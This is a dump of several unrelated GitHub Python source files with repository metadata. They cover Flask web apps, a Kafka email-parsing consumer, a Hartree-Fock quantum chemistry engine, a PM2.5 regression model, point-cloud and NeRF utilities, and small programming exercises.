os.listdir(current_app.config['UPLOAD_FOLDER']):\n with open(os.path.join(current_app.config['UPLOAD_FOLDER'], filename)) as json_file:\n stringdata = json.load(json_file)\n data = json.loads(stringdata)\n participants = data[\"participants\"]\n messages = messages + data['messages']\n # getting list of participants across all files.\n for member in participants:\n list_of_people.append(member.get('name'))\n list_of_people = list(set(list_of_people))\n os.remove(os.path.join(current_app.config['UPLOAD_FOLDER'], filename))\n for person in list_of_people:\n profile = Person(person)\n list_results.append(profile)\n # looping over messages in n^2 :<\n for message in messages:\n for each in list_results:\n if message.get('sender_name') in each.id:\n if message.get('content') or message.get('photos') or message.get('videos') or message.get(\n 'gifs') or message.get('sticker') or message.get('audio_files') or message.get('files'):\n # updating how many messages were sent\n each.up_comments()\n reacts = message.get('reactions')\n temp_counter = ReactCounter()\n if reacts:\n for react in reacts:\n cur_react = react_classifier(react.get('reaction'))\n temp_counter.add_count(cur_react)\n # update number of reacts received\n y = getattr(each, cur_react)\n y.up_received()\n # updating how many reacts someone has sent\n for listee in list_results:\n if react.get('actor') in listee.id:\n actor_react = getattr(listee, cur_react)\n actor_react.up_given()\n for each_type in react_types:\n # setting new top comment for each react type\n if react_compare(each, temp_counter, each_type):\n x = getattr(getattr(each, each_type))\n setattr(x, 'top_comment', message.get('content'))\n else:\n # update how many messages were deleted\n each.up_deleted()\n\n # os.remove(os.path.join(current_app.config['UPLOAD_FOLDER'], filename))\n\n member_values = []\n heart_values = []\n laugh_values = []\n wow_values = []\n cry_values = []\n angry_values = []\n thumbs_up_values = []\n thumbs_down_values = []\n pie_delete_values = []\n pie_messages_values = []\n for each in list_results:\n member_values.append(each.id)\n heart_values.append(each.heart.num_received)\n laugh_values.append(each.laugh.num_received)\n wow_values.append(each.wow.num_received)\n cry_values.append(each.cry.num_received)\n angry_values.append(each.angry.num_received)\n thumbs_up_values.append(each.thumbs_up.num_received)\n thumbs_down_values.append(each.thumbs_down.num_received)\n pie_delete_values.append(each.num_deleted)\n pie_messages_values.append(each.num_comments)\n\n return render_template('result.html', title='Your Chat', member_values=member_values, heart_values=heart_values,\n laugh_values=laugh_values, wow_values=wow_values, cry_values=cry_values,\n angry_values=angry_values, thumbs_up_values=thumbs_up_values,\n thumbs_down_values=thumbs_down_values, pie_messages_values=pie_messages_values,\n pie_delete_values=pie_delete_values, len=len(member_values))\n","repo_name":"snyoon/facebook_chat_data_tool","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38900901083","text":"import numpy as np\n\n# COLA\nimport ColaOpen3D as o4d\n\n\ndef voxel_downsample_with_label(pts, labels, voxel_size):\n \"\"\"\n pts: Nx3 ndarray\n labels: Nx1 ndarray\n \"\"\"\n pcd = o4d.geometry.ColaPointCloud(pts)\n tree = o4d.geometry.KDTreeFlann(pcd.data)\n\n pcd_down = pcd.voxel_down_sample(voxel_size=voxel_size)\n \n # get label\n pts_down = np.asarray(pcd_down.arr)\n labels_down = np.zeros(len(pts_down), dtype=np.int32)\n for i, query in enumerate(pts_down):\n query = query.reshape(3, -1)\n idx = tree.search_knn_vector_3d(query=query, knn=1)[1][0]\n labels_down[i] = labels[idx]\n \n return pts_down, labels_down \n\n","repo_name":"shaochengyan/ColaLib","sub_path":"ColaPCDUtils/downsample_utils.py","file_name":"downsample_utils.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13865251312","text":"'''\nviewer.py: part of the niftidrop package\n\n'''\nimport os\nfrom niftidrop.templates import get_template, add_string, save_template\nfrom niftidrop.utils import get_random_name, get_extension\nfrom niftidrop.browser import view\n\n\n\"\"\"\ngenerate\n\nwill generate a niftidrop viewer to run locally or on a webserver\n\nviewer_input: dictionary with {\"nifti.nii.gz\":\"nidm.ttl\"}, with full paths. \n Paths should be relative to a web_root if view = False, or full paths\n to files on the local system if view=True.\nbase_image: The base image to use for the viewer. Not specifying a base_image will\n yield a black background. The same standard applies for the path as \n for image_paths.\nview: open a temporary web browser (to run locally). If True, images will be copied\n to a temp folder. If False, image_paths must be relative to web server. File names \n should be unique. \n\n\"\"\"\ndef generate(viewer_input,base_image,view_in_browser=True,bootstrap=True,template_choice=\"index\"):\n\n template = get_template(template_choice) \n\n if view_in_browser==True:\n new_viewer_input = generate_temp(viewer_input)\n new_image_paths = new_viewer_input.keys()\n new_nidm_paths = new_viewer_input.values()\n new_base_image = generate_temp({base_image:base_image})\n template = add_string(\"[SUB_SERVERIMAGES_SUB]\",str(new_image_paths),template)\n template = add_string(\"[SUB_SERVERNIDMS_SUB]\",str(new_nidm_paths),template)\n template = add_string(\"[SUB_BASEIMAGE_SUB]\",str(new_base_image.keys()[0]),template)\n new_paths = new_image_paths + new_nidm_paths + new_base_image.keys() \n real_paths = viewer_input.keys() + viewer_input.values() + [base_image] \n url_vars = \"?file=%s\" %(new_viewer_input.values()[0]) \n view(template,real_paths,new_paths,url_vars)\n\n else:\n if bootstrap:\n template = template.split(\"\\n\")\n template = get_bootstrap() + template\n template = \"\\n\".join(template)\n template = add_string(\"[SUB_SERVERIMAGES_SUB]\",str(viewer_input.keys()),template)\n template = add_string(\"[SUB_SERVERNIDMS_SUB]\",str(viewer_input.values()),template)\n template = add_string(\"[SUB_BASEIMAGE_SUB]\",base_image,template)\n return template\n\ndef generate_temp(viewer_input):\n # Here we will generate a lookup of temporary files\n new_viewer_input = dict()\n for image_path,nidm_path in viewer_input.iteritems():\n image_ext = get_extension(image_path)\n nidm_ext = get_extension(nidm_path) \n temp_path = get_random_name()\n temp_nidm_path = \"%s.%s\" %(temp_path,nidm_ext)\n temp_image_path = \"%s.%s\" %(temp_path,image_ext)\n new_viewer_input[temp_image_path] = temp_nidm_path\n return new_viewer_input \n\ndef get_bootstrap():\n return ['','','']\n","repo_name":"vsoch/nifti-drop","sub_path":"niftidrop/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"25030281926","text":"from string import ascii_letters\n\ndef solution():\n\trl = open(0).readline\n\tpriority_map = '_' + ascii_letters\n\tresult = 0\n\n\twhile True:\n\t\tgroup = [set(rl().strip()) for _ in range(3)]\n\t\tif not group[0]:\n\t\t\tbreak\n\n\t\tdup = group[0] & group[1] & group[2]\n\t\tresult += priority_map.find(*dup)\n\n\treturn result\n\nprint(solution())\n","repo_name":"qyurila/advent-of-code-solution","sub_path":"2022/Day 3 - Rucksack Reorganization/part02.py","file_name":"part02.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3327951035","text":"#Importing Libraries\r\nimport pandas as pd \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sb\r\n\r\n#Importing dataset\r\ndf=pd.read_csv('Data/Real-Data/Real_combine.csv')\r\n\r\n#cgecking for null values\r\nsb.heatmap(df.isnull(),yticklabels=False,cmap='viridis')\r\n\r\n#droping null values\r\ndf=df.dropna()\r\n\r\n#plotting pairwise relationship between dataset\r\nsb.pairplot(df)\r\n\r\n#checking correlation\r\na=df.corr()\r\n\r\n#splitting datasets\r\nX=df.iloc[:,:-1]\r\ny=df.iloc[:,-1].values\r\ny=y.reshape(-1,1)\r\n\r\n#handling missing vlaues(0 in pm2.5)\r\nfrom sklearn.impute import SimpleImputer\r\nim=SimpleImputer(missing_values=0,strategy='mean')\r\nim=im.fit(y)\r\ny=im.transform(y)\r\n\r\n#feature selection\r\nfrom sklearn.tree import ExtraTreeRegressor\r\nmodel=ExtraTreeRegressor()\r\nmodel.fit(X,y)\r\nprint(model.feature_importances_)\r\nfeat_imp=pd.Series(model.feature_importances_,index=X.columns)\r\nfeat_imp.nlargest(5).plot(kind='barh')#picking 5 columns that are in corelations with pm2.5\r\nplt.show()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3)\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nreg=RandomForestRegressor()\r\nreg.fit(X_train,y_train)\r\ny_pred=reg.predict(X_test)\r\n\r\nprint('r^2 value of train set:',reg.score(X_train,y_train))\r\nprint('r^2 value of test set:',reg.score(X_test,y_test))\r\n#plotting\r\nsb.distplot(y_test-y_pred)\r\n\r\nfrom sklearn.model_selection import cross_val_score\r\ncv=cross_val_score(reg,X,y,cv=5,n_jobs=-1)\r\nprint(cv)\r\ncv_mean=cv.mean()\r\n\r\n#hyperparameter tuning\r\nn_estimators=[int(x) for x in np.linspace(start=100,stop=1200,num=12)]\r\nmax_depth=[int(x) for x in np.linspace(start=5,stop=30,num=6)]\r\nparameters={'n_estimators':n_estimators,'max_features':['auto','sqrt'],\r\n 'max_depth':max_depth,'min_samples_split':[2,5,10,15,20],'min_samples_leaf':[1,2,5,10]}\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\nrandom_search=RandomizedSearchCV(reg,param_distributions=parameters,n_iter=100,scoring='neg_mean_squared_error',cv=5,verbose=2)\r\nrandom_search.fit(X_train,y_train)\r\n\r\nrandom_search.best_params_\r\nrandom_search.best_score_\r\n\r\npred=random_search.predict(X_test)\r\n#plotting\r\nsb.distplot(y_test-pred)\r\n\r\n#regression evaluation metrics\r\nimport sklearn.metrics as mt\r\nprint('RMSE:',np.sqrt(mt.mean_absolute_error(y_test,pred)))\r\n\r\nimport pickle\r\nfile=open('randomforest_model.pkl','wb')\r\npickle.dump(random_search,file)\r\n\r\n#for sinagle day\r\nrandom_search.predict([[24.7 , 29.9 , 20.5 , 1018.5 , 65.0 , 6.9 , 8.0 , 14.8]])\r\n","repo_name":"GovindDogra/PM2.5_Predictor","sub_path":"PM2.5 prediction/ramdom_forest_reg.py","file_name":"ramdom_forest_reg.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72980252641","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('inmuebles', '0007_inmuebles_logo'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='inmuebles',\n name='slug',\n field=models.CharField(default=b'', max_length=100, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"javierpedrozaing/inmobiliaria","sub_path":"inmuebles/migrations/0008_inmuebles_slug.py","file_name":"0008_inmuebles_slug.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32670428062","text":"from pyscf.gto import Mole\nfrom scipy.linalg import eigh, fractional_matrix_power\nfrom util import atoms\nfrom typing import Tuple, List\nimport math\nimport numpy as np\n\n\nclass HartreeFockEngine():\n def __init__(self, molecule: List[Tuple[int, float, float, float]], charge: int, basis: str, unit: str) -> None:\n # PYSCF Molecule\n self.mol: Mole = atoms.getPYSCFMolecule(molecule, charge, basis, unit)\n self.n_electrons: int = self.mol.tot_electrons()\n\n # Energies and Integrals\n self.nuc_energy = HartreeFockEngine.calculateNuclearRepulsionEnergy(\n molecule)\n self.overlap_integrals = self.mol.intor('int1e_ovlp')\n self.kinetic_integrals = self.mol.intor('int1e_kin')\n self.nuclear_integrals = self.mol.intor('int1e_nuc')\n self.two_e_integrals = self.mol.intor('int2e')\n\n # Hamiltonian\n self.core_hamiltonian = self.kinetic_integrals + self.nuclear_integrals\n\n # Orthogonalizing Matrix\n self.ortho_mat = fractional_matrix_power(self.overlap_integrals, -1/2)\n\n # Program Outputs\n self.energy: float = 0\n self.density_mat: np.ndarray = np.zeros((self.mol.nao, self.mol.nao))\n self.cycles: int = 0\n self.converged: bool = False\n\n def calculateDensity(self, fock_mat: np.ndarray) -> np.ndarray:\n # Transform Fock matrix to orthonormal basis:\n fock_ortho = (self.ortho_mat.conj().T) @ fock_mat @ self.ortho_mat\n # Diagonalize Fock matrix\n _, coeff_ortho = eigh(fock_ortho)\n # Construct eigenvector matrix to get the orbital coefficients\n coeff_mat = self.ortho_mat @ coeff_ortho\n # Form density matrix\n density_mat = 2 * \\\n coeff_mat[:, :(self.n_electrons//2)] @ coeff_mat[:,\n :(self.n_electrons//2)].T\n return density_mat\n\n def calculateFock(self, density_mat: np.ndarray) -> np.ndarray:\n fock_mat = np.empty((self.mol.nao, self.mol.nao))\n for u in range(fock_mat.shape[0]):\n for v in range(fock_mat.shape[1]):\n # F_uv = H_uv + Coulomb Integral - 1/2 * Exchange Integral\n coulomb = (self.two_e_integrals[u, v] * density_mat).sum()\n exchange = (self.two_e_integrals[u, :, v] * density_mat).sum()\n fock_mat[u, v] = self.core_hamiltonian[u, v] + \\\n coulomb - (0.5 * exchange)\n return fock_mat\n\n def calculateEnergy(self, density_mat: np.ndarray) -> float:\n fock_mat = self.calculateFock(density_mat)\n # Energy = Sum over uv: D_uv (H_uv + F_uv) + E_nuc\n total_energy = self.nuc_energy + \\\n (0.5 * density_mat * (fock_mat + self.core_hamiltonian)).sum()\n return total_energy\n\n def calculateNuclearRepulsionEnergy(molecule: List[Tuple[int, float, float, float]]) -> float:\n nuc: float = 0\n for A in range(len(molecule) - 1):\n for B in range(A + 1, len(molecule)):\n dx = (molecule[A][1] - molecule[B][1])\n dy = (molecule[A][2] - molecule[B][2])\n dz = (molecule[A][3] - molecule[B][3])\n nuc += (molecule[A][0] * molecule[B][0]) / \\\n math.sqrt(dx ** 2 + dy ** 2 + dz ** 2)\n return nuc\n\n def converge(self, density_guess: np.ndarray = None, max_iterations: int = 64, energy_threshold: float = 1e-10, density_threshold: float = 1e-6) -> float:\n # Initial density is the guess, initial energy is 0\n density_mat = np.zeros((self.mol.nao, self.mol.nao)\n ) if density_guess is None else density_guess\n total_energy = 0\n\n # First Cycle: calculate new fock matrix from density, new density from fock matrix\n fock_mat = self.calculateFock(density_mat)\n new_density = self.calculateDensity(fock_mat)\n new_energy = self.calculateEnergy(new_density)\n\n # Differences: calculate the change in energy and density\n delta_energy = new_energy - total_energy\n delta_density = math.sqrt(\n np.square(np.subtract(new_density, density_mat)).mean())\n\n # Cycles\n iterations = 1\n for i in range(max_iterations):\n # Check for convergence (both change in energy and density below thresholds)\n if delta_energy < energy_threshold and delta_density < density_threshold:\n total_energy = new_energy\n density_mat = new_density\n break\n # Hasn't converged; generate new fock matrix and new density matrix\n fock_mat = self.calculateFock(new_density)\n new_density = self.calculateDensity(fock_mat)\n new_energy = self.calculateEnergy(new_density)\n # Diffs\n delta_energy = new_energy - total_energy\n delta_density = math.sqrt(\n np.square(np.subtract(new_density, density_mat).real).mean())\n # Keep track of iterations\n iterations += 1\n # Update energy and density\n total_energy = new_energy\n density_mat = new_density\n # store results\n self.energy = total_energy\n self.density_mat = density_mat\n self.cycles = iterations\n self.converged = (\n delta_energy < energy_threshold and delta_density < density_threshold)\n\n return self.energy\n\n\ndef calculateHFEnergy(mol: List[Tuple[int, float, float, float]], charge: int = 0, basis: str = 'sto-3g', unit: str = 'bohr') -> Tuple[float, np.ndarray, bool, int]:\n \"\"\"\n mol = [(8, 0.000000000000, -0.143225816552, 0.000000000000), \n (1, 1.638036840407, 1.136548822547, -0.000000000000), \n (1, -1.638036840407, 1.136548822547, -0.000000000000)]\n \"\"\"\n hf = HartreeFockEngine(mol, charge, basis, unit)\n hf.converge(density_threshold=1e-8, max_iterations=50)\n return (hf.energy, hf.density_mat, hf.converged, hf.cycles)\n","repo_name":"chrisrollsdice/MolGeo","sub_path":"energy/hartreefock.py","file_name":"hartreefock.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37161861812","text":"import torch\n\ndef batchify_rays(render_fn, rays_flat, chunk=1024 * 32):\n\n \"\"\" Render rays in smaller minibatches to avoid OOM \"\"\"\n\n all_ret = {}\n for i in range(0, rays_flat.shape[0], chunk):\n ret = render_fn(rays_flat[i:i + chunk])\n for k in ret:\n if k not in all_ret:\n all_ret[k] = []\n all_ret[k].append(ret[k])\n\n all_ret = {k: torch.cat(all_ret[k], 0) for k in all_ret}\n return all_ret\n\n\ndef batchify(fn, chunk):\n\n \"\"\" Constructs a version of 'fn' that applies to smaller batches \"\"\"\n\n if chunk is None:\n return fn\n\n def ret(inputs):\n return torch.cat([fn(inputs[i:i + chunk]) for i in range(0, inputs.shape[0], chunk)], 0)\n\n return ret","repo_name":"dmjovan/PSIML8-NeRF","sub_path":"nerf/training/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39665598147","text":"def transformaEmFloat(lista):\n lista[1]=lista[1].replace(',' , '.')\n lista[1]=float(lista[1])\n return lista\ndef corrigeData(lista):\n for i in range(len(lista)):\n data = lista[i]\n ano = data[:4]\n mes = data[5:]\n lista[i] = mes + \"-\" + ano\n return lista\ndef maiorEMenor(lista):\n menor_elemento=lista[0]\n maior_elemento=lista[0]\n for elemento in lista:\n if(elementomaior_elemento):\n maior_elemento=elemento\n indiceMenor=lista.index(menor_elemento)\n indiceMaior=lista.index(maior_elemento)\n return menor_elemento,maior_elemento,indiceMenor,indiceMaior\ndatas=[]\nipcas=[]\ndatas_ipcas=[]\nwhile True:\n data_ipca=input()\n if data_ipca==\"*\":\n break\n datas_ipcas=data_ipca.split(\" \")\n transformaEmFloat(datas_ipcas)\n datas.append(datas_ipcas[0])\n ipcas.append(datas_ipcas[1])\ndatasCorrigidas=corrigeData(datas)\nmenor_e_maior=maiorEMenor(ipcas)\nmenorIpca,maiorIpca,indiceMenor,indiceMaior=menor_e_maior\nprint(f\"Menor: {menorIpca} ({datas[indiceMenor]})\")\nprint(f\"Maior: {maiorIpca} ({datas[indiceMaior]})\")\nmediaIpcas=sum(ipcas)/len(ipcas)\nprint(f\"Media: {mediaIpcas:.2f}\")","repo_name":"AurinoMSMF/Exercicios","sub_path":"TheHuxley/15-Exercicio_Rev(3990).py","file_name":"15-Exercicio_Rev(3990).py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19942746734","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Database model definitions.\"\"\"\n\nimport datetime\nimport time\nfrom typing import Optional\n\nimport sqlalchemy\nfrom flask_login import UserMixin\nfrom passlib.pwd import genword\n\nfrom . import db, user_hasher\n\n\nclass Invitation(db.Model):\n \"\"\"User invitation.\n\n Attributes:\n id (int): ID of the invitation.\n owner_id (int): ID of the owner of the invite.\n user_id (int): ID of the user that signed up using this invite.\n token (str): Token used to signup.\n expiration (datetime): Date at which the invitation is no longer valid.\n \"\"\"\n __tablename__ = 'invitations'\n\n id = db.Column(db.Integer, primary_key=True)\n owner_id = db.Column(\n db.Integer,\n db.ForeignKey(\n 'users.id',\n name='fk_invitation_users_owner',\n onupdate='CASCADE',\n ondelete='CASCADE'\n ),\n nullable=False\n )\n user_id = db.Column(\n db.Integer,\n db.ForeignKey(\n 'users.id',\n name='fk_invitation_users_user',\n onupdate='CASCADE',\n ondelete='CASCADE'\n ),\n nullable=True\n )\n token = db.Column(\n db.String(64),\n nullable=False,\n default=genword(length=64),\n unique=True\n )\n expiration = db.Column(\n db.DateTime,\n nullable=False,\n default=datetime.datetime.utcnow()+datetime.timedelta(weeks=1),\n # If the server supports it:\n # server_default=sqlalchemy.sql.expression.text('NOW() + INTERVAL \\'1 week\\'')\n )\n\n # Relationships\n owner = db.relationship(\n 'User',\n primaryjoin=('Invitation.owner_id == User.id')\n )\n\n user = db.relationship(\n 'User',\n primaryjoin=('Invitation.user_id == User.id')\n )\n\n @classmethod\n def get_by_token(cls, token: str) -> Optional['Invitation']:\n \"\"\"Obtain an already existing invitation by token.\n\n Args:\n token (str): Token of the invitation.\n\n Returns:\n Invitation instance or `None` if not found.\n \"\"\"\n return cls.query.filter_by(token=token).first()\n\n @classmethod\n def generate_token(cls) -> str:\n \"\"\"Generate a random token for the invitation.\n\n Returns:\n Random token.\n \"\"\"\n return genword(length=64)\n\n\nclass User(db.Model, UserMixin):\n \"\"\"User definition.\n\n Attributes:\n id (int): User ID.\n username (str): Username, must be unique.\n password (str): Encrypted password.\n email (str): Email of the user, must be unique.\n is_active (bool): Whether the user is active (can login).\n locale (str): Locale code.\n timezone (str): Timezone used to localize dates.\n invitations (int): Remaining invitations for this user.\n serial (str): Serial for sessions.\n joined_at (datetime): Date at which the user joined.\n password_reset_token (str): Unique token used to reset the password.\n password_reset_expiration (datetime): Date at which the password reset\n token expires.\n \"\"\"\n __tablename__ = 'users'\n\n id = db.Column(db.Integer, primary_key=True)\n\n # Authentication\n username = db.Column(db.String(50), nullable=False, unique=True)\n password = db.Column(db.String(255), nullable=False, default='')\n email = db.Column(db.String(255), nullable=False, unique=True)\n is_active = db.Column(db.Boolean, nullable=False,\n default=False, server_default='f')\n\n # Additional attributes\n locale = db.Column(db.String(2), nullable=False,\n default='en', server_default='en')\n timezone = db.Column(db.String(50), nullable=False,\n default='UTC', server_default='UTC')\n invitations = db.Column(db.Integer, nullable=False,\n default=10, server_default='10')\n serial = db.Column(db.Text, nullable=False,\n default=lambda: User.generate_serial())\n\n joined_at = db.Column(db.DateTime, nullable=False,\n default=datetime.datetime.utcnow(),\n server_default=sqlalchemy.sql.func.now())\n password_reset_token = db.Column(db.String(100), nullable=True, unique=True)\n password_reset_expiration = db.Column(db.DateTime, nullable=True)\n\n @property\n def hashid(self) -> str:\n \"\"\"Calculate the Hashid from user ID.\"\"\"\n return user_hasher.encode(self.id)\n\n @staticmethod\n def generate_serial(length: int = 5) -> str:\n \"\"\"Generate a valid session serial.\n\n A serial is comprised of the current timestamp and N random characters.\n\n Args:\n length (int): Length for the random string appended to the timestamp.\n\n Returns:\n Serial string.\n \"\"\"\n return '{}{}'.format(int(time.time()), genword(length=length))\n\n @classmethod\n def get_by_username(cls, username: str) -> Optional['User']:\n \"\"\"Obtain an already existing user by username.\n\n Args:\n username (str): Unique username of the user\n\n Returns:\n User instance or None if not found.\n \"\"\"\n return cls.query.filter_by(username=username).first()\n\n @classmethod\n def get_by_email(cls, email: str) -> Optional['User']:\n \"\"\"Obtain an already existing user by email.\n\n Args:\n email (str): Unique email of the user\n\n Returns:\n User instance or None if not found.\n \"\"\"\n return cls.query.filter_by(email=email).first()\n\n def get_id(self) -> str:\n \"\"\"Return the ID to use for the login manager.\n\n This is generated by concatenating the numerical ID and the serial\n in order to allow invalidating user sessions on certain scenarios\n such as password change.\n\n Returns:\n ID to use for session tokens.\n \"\"\"\n return '{}_{}'.format(self.id, self.serial)\n","repo_name":"rmed/flask-modern-template","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36455610450","text":"'''\nDetect Loop\nGiven a head pointer to the linked list, check if the linked list has loop or not. If it has loop, function should return 1, else it should return 0.\n\nNote:\nThis is a functional problem, so you don't need to worry about the input and output format. Simply take care of the detectLoop function.\n\nExample & Explanation:\nSuppose, given Linked List is:\n\n76 -> 66 -> 11 -> 73 -> 77 \n ^ |\n |_________________| \nThen, the output should be:\n\n1\nBecause, the given linked list consists of a loop!\n\n'''\n# Python program to detect loop in the linked list \n\n# Node class \nclass Node: \n\n\t# Constructor to initialize the node object \n\tdef __init__(self, data): \n\t\tself.data = data \n\t\tself.next = None\n\nclass LinkedList:\n# Function to initialize head \n def __init__(self): \n self.head = None\n\n# Do not change anything above this line\n\n def detectLoop(self):\n # YOU ONLY NEED TO COMPLETE THIS FUNCTION.\n # RETURN 1 IF LOOP IS THERE IN THE LINKED LIST, ELSE RETURN 0\n temp=self.head\n f=temp.next\n s=temp.next.next\n while s!=None: \n if f==s:\n return 1\n f=f.next\n s=s.next.next\n return 0\n\n\n# Do not change anything below this line\nif __name__ == '__main__':\n \n n = int(input())\n\n # Start with the empty list \n llist = LinkedList() \n\n temp = [int(x) for x in input().split()]\n\n if(n<1):\n llist.head = None\n elif(n<2):\n llist.head = Node(temp[0])\n else:\n llist.head = Node(temp[0])\n second = Node(temp[1])\n llist.head.next = second\n curr = llist.head.next\n\n\n for i in range(2,n):\n t = Node(temp[i])\n curr.next = t\n curr = curr.next\n\n link = int(input())\n if(link!=-1):\n t = llist.head\n for _ in range(link-1):\n t = t.next\n curr.next = t\n\n # llist.printList()\n print(llist.detectLoop())","repo_name":"iamnishantchandra/DSA-QA-Using-Python","sub_path":"10X/Python/Sorting/Detect Loop link list.py","file_name":"Detect Loop link list.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"72856800802","text":"from concurrent import futures\nfrom confluent_kafka import Consumer, Producer, OFFSET_BEGINNING\nimport logger\nimport json\nfrom typing import List\nimport asyncio\nimport threading\nimport os\nfrom threading import Thread\nimport time\nfrom gen_parse import aget_parse_results\n\n\nKAFKA_CONFIG = {\n \"bootstrap.servers\": \"kafka:29092\",\n \"group.id\": \"parse\",\n \"auto.offset.reset\": \"earliest\",\n}\nMAX_WORKERS = 10\nMAX_CONCURRENT_REQUESTS_PER_WORKER = 10\n\n\nclass RetryCounter:\n def __init__(\n self,\n producer: Producer,\n max_retries: int = 5,\n *args,\n **kwargs,\n ):\n self.producer = producer\n self.retries = max_retries\n self.id = kwargs.get(\"taskid\", -1)\n\n def __call__(self, err, msg):\n if err is not None:\n logger.warning(f\"Error when producing message to topic: {err}\")\n self.retries -= 1\n if self.retries > 0:\n self.producer.produce(\n msg.topic(),\n key=msg.key().decode(\"utf-8\"),\n value=msg.value().decode(\"utf-8\"),\n on_delivery=self,\n )\n logger.info(f\"Retry producing message to topic: {msg.topic()}\")\n else:\n logger.error(f\"Failed to produce message to topic: {msg.topic()}\")\n self.producer.produce(\n \"errors\",\n key=\"error\",\n value=json.dumps(\n {\n \"key\": msg.key().decode(\"utf-8\"),\n \"msg\": msg.value().decode(\"utf-8\"),\n \"error\": f\"fail to produce message to topic: {msg.topic()}\",\n \"description\": str(err),\n }\n ),\n )\n else:\n email = json.loads(msg.value().decode(\"utf-8\"))\n logger.info(\n f\"[{self.id}]: Successfully produced email (id = {email['email_id']}, address = {email['address']}) to topic: {msg.topic()}\"\n )\n\n\nasync def req_retry_handler(\n email: dict,\n producer: Producer,\n max_retries=3,\n sem: asyncio.BoundedSemaphore = None,\n taskid=None,\n):\n retries = max_retries\n err_str = \"\"\n logger.info(\n f\"Parsing events for email: email_id = {email['email_id']}, address = {email['address']}\"\n )\n while retries > 0:\n try:\n events = await aget_parse_results(email[\"item\"], max_retries, semaphore=sem)\n for event in events[\"events\"]:\n item = {\n \"user_id\": email[\"user_id\"],\n \"email_id\": email[\"email_id\"],\n \"address\": email[\"address\"],\n \"event\": event,\n }\n producer.produce(\n \"events\",\n key=\"event\",\n value=json.dumps(item),\n on_delivery=RetryCounter(producer, max_retries, taskid=taskid),\n )\n return\n except Exception as e:\n retries -= 1\n err_str = str(e)\n logger.error(\n \"Error retriving emails for request: {}, retrying in 1s ...\".format(\n err_str\n )\n )\n await asyncio.sleep(1)\n\n producer.produce(\n \"errors\",\n key=\"error\",\n value=json.dumps({\"email\": email, \"error\": err_str}),\n )\n\n\ndef task_func(\n emails: List[str],\n producer: Producer,\n max_retries=3,\n):\n logger.info(\n f\"start processing {len(emails)} emails with thread id {threading.get_ident()}, process id {os.getpid()} ...\"\n )\n try:\n emails = [json.loads(req_msg.value()) for req_msg in emails]\n # print(json.dumps(reqs, indent=2))\n sem = asyncio.BoundedSemaphore(MAX_CONCURRENT_REQUESTS_PER_WORKER)\n tasks = [\n req_retry_handler(email, producer, max_retries, sem, i)\n for i, email in enumerate(emails)\n ]\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.gather(*tasks))\n logger.info(f\"Finished parsing {len(emails)} emails\")\n except Exception as e:\n logger.error(\"Error parsing emails: {}\".format(str(e)))\n logger.warning(\"requests: {}\".format([r.value() for r in emails]))\n raise e\n\n\ndef serve():\n logger.info(\n f\"start running async server at thread id {threading.get_ident()}, process id {os.getpid()} ...\"\n )\n\n consumer = Consumer(KAFKA_CONFIG)\n consumer.subscribe([\"new_emails\"])\n producer = Producer(KAFKA_CONFIG)\n\n def producer_periodic_poll():\n while True:\n producer.poll(0.5)\n time.sleep(0.5)\n\n p_thread = Thread(target=producer_periodic_poll, daemon=True)\n p_thread.start()\n\n def worker_init():\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n logger.debug(f\"worker thread id {threading.get_ident()} initialized ...\")\n\n logger.info(\"Start consuming messages ...\")\n\n with futures.ThreadPoolExecutor(\n max_workers=MAX_WORKERS, initializer=worker_init\n ) as executor:\n while True:\n reqs = consumer.consume(\n num_messages=MAX_CONCURRENT_REQUESTS_PER_WORKER, timeout=1.0\n )\n if len(reqs) == 0:\n continue\n logger.info(\"Received {} requests\".format(len(reqs)))\n executor.submit(task_func, reqs, producer, 5)\n logger.info(\"Sent {} requests to executor\".format(len(reqs)))\n\n\nif __name__ == \"__main__\":\n logger.logger_init(\n log_dir=\"log\", name=\"parse-async\", level=\"INFO\", when=\"D\", backupCount=7\n )\n 